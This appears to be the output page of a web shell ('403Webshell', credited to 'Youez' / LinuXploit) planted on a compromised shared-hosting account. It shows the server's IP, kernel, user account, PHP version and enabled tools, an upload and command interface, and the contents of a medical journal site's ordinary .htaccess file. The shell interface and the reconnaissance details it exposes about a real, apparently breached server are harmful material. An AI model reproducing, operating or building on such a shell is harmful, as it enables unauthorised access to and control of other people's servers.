403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/www/gastroenterojournal.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhilnew/www/gastroenterojournal.com/.htaccess
Options +FollowSymLinks -MultiViews -Indexes
# secure htaccess file
<Files .htaccess>
order allow,deny
deny from all
</Files>
<Files ~ "header\.php$">  
order allow,deny
deny from all
</Files>
<Files ~ "footer\.php$">  
order allow,deny
deny from all
</Files>

<IfModule mod_rewrite.c>
RewriteEngine On
ErrorDocument 403 '<html><head><title>404 Page Not Found</title><link rel="shortcut icon" href="https://www.gastroenterojournal.com/images/favicon.ico" /><style>*{margin:0px;padding:0px;box-sizing:border-box;outline:none;font-family:Arial, Helvetica, sans-serif}.error{max-width:400px;height:245px;position:fixed;top:0px;bottom:0px;left:0px;right:0px;margin:auto;text-align:center}h1{font-size:96px}h4{font-weight:normal}p{font-size:13px}a{background:#0c375b;padding:9px 18px;text-decoration:none;font-size:12px;color:#fff;font-weight:bold;border-radius:2px;-moz-border-radius:2px;-webkit-border-radius:2px;}</style></head><div class="error"><h1>404</h1><h4>OOPS, SORRY WE CAN&apos;T FIND THAT PAGE</h4><br clear="all"><p>Either something went wrong or the page doesn&apos;t exist anymore.</p><br clear="all"><br clear="all"><a href="http://www.gastroenterojournal.com">HOME PAGE</a></div></html>'

ErrorDocument 404 '<html><head><title>404 Page Not Found</title><link rel="shortcut icon" href="http://www.gastroenterojournal.com/images/favicon.ico" /><style>*{margin:0px;padding:0px;box-sizing:border-box;outline:none;font-family:Arial, Helvetica, sans-serif}.error{max-width:400px;height:245px;position:fixed;top:0px;bottom:0px;left:0px;right:0px;margin:auto;text-align:center}h1{font-size:96px}h4{font-weight:normal}p{font-size:13px}a{background:#0c375b;padding:9px 18px;text-decoration:none;font-size:12px;color:#fff;font-weight:bold;border-radius:2px;-moz-border-radius:2px;-webkit-border-radius:2px;}</style></head><div class="error"><h1>404</h1><h4>OOPS, SORRY WE CAN&apos;T FIND THAT PAGE</h4><br clear="all"><p>Either something went wrong or the page doesn&apos;t exist anymore.</p><br clear="all"><br clear="all"><a href="http://www.gastroenterojournal.com">HOME PAGE</a></div></html>'

RewriteCond %{HTTP_HOST} ^gastroenterojournal.com [NC]
RewriteRule ^(.*)$ http://www.gastroenterojournal.com/$1 [L,R=301,NC]

RewriteCond %{THE_REQUEST} ^[A-Z]{3,}\s([^.]+)\.php[\s?] [NC]
RewriteRule ^ %1 [R=301,L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^board/([^/]+)$ board.php?tab=$1 [L,QSA]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^archives/(.*)$ archives.php?params=$1 [L,QSA]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^search/(.*)$ search.php?keyword=$1 [L,QSA]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^articles/([0-9]+)/(.*)$ articles.php?articleid=$1&file=$2 [L,QSA]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^txnresponse/([a-zA-Z0-9]+)/([A-Z0-9]+)/([a-z]+)$ txnresponse.php?txnid=$1&sc=$2&status=$3 [L,QSA]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^([^\.]+)$ $1.php [NC,L]
</IfModule>

AddDefaultCharset utf-8

<IfModule mod_headers.c>
# Set XSS Protection header
Header set X-XSS-Protection "1; mode=block"
</IfModule>

## EXPIRES CACHING ##
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType image/jpg "access 1 year"
ExpiresByType image/jpeg "access 1 year"
ExpiresByType image/gif "access 1 year"
ExpiresByType image/png "access 1 year"
ExpiresByType text/css "access 1 month"
ExpiresByType text/html "access 1 month"
ExpiresByType application/pdf "access 1 month"
ExpiresByType text/x-javascript "access 1 month"
ExpiresByType application/x-shockwave-flash "access 1 month"
ExpiresByType image/x-icon "access 1 year"
ExpiresDefault "access 1 month"
</IfModule>
## EXPIRES CACHING ##

<ifModule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_dechunk Yes
mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
mod_gzip_item_include handler ^cgi-script$
mod_gzip_item_include mime ^text/.*
mod_gzip_item_include mime ^application/x-javascript.*
mod_gzip_item_exclude mime ^image/.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
</ifModule>

<IfModule mod_deflate.c>
# Compress HTML, CSS, JavaScript, Text, XML and fonts
AddOutputFilterByType DEFLATE application/javascript
AddOutputFilterByType DEFLATE application/rss+xml
AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
AddOutputFilterByType DEFLATE application/x-font
AddOutputFilterByType DEFLATE application/x-font-opentype
AddOutputFilterByType DEFLATE application/x-font-otf
AddOutputFilterByType DEFLATE application/x-font-truetype
AddOutputFilterByType DEFLATE application/x-font-ttf
AddOutputFilterByType DEFLATE application/x-javascript
AddOutputFilterByType DEFLATE application/xhtml+xml
AddOutputFilterByType DEFLATE application/xml
AddOutputFilterByType DEFLATE font/opentype
AddOutputFilterByType DEFLATE font/otf
AddOutputFilterByType DEFLATE font/ttf
AddOutputFilterByType DEFLATE image/svg+xml
AddOutputFilterByType DEFLATE image/x-icon
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE text/javascript
AddOutputFilterByType DEFLATE text/plain
AddOutputFilterByType DEFLATE text/xml

# Remove browser bugs (only needed for really old browsers)
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
Header append Vary User-Agent
</IfModule>
<Files 403.shtml>
order allow,deny
allow from all
</Files>

Youez - 2016 - github.com/yon3zu
LinuXploit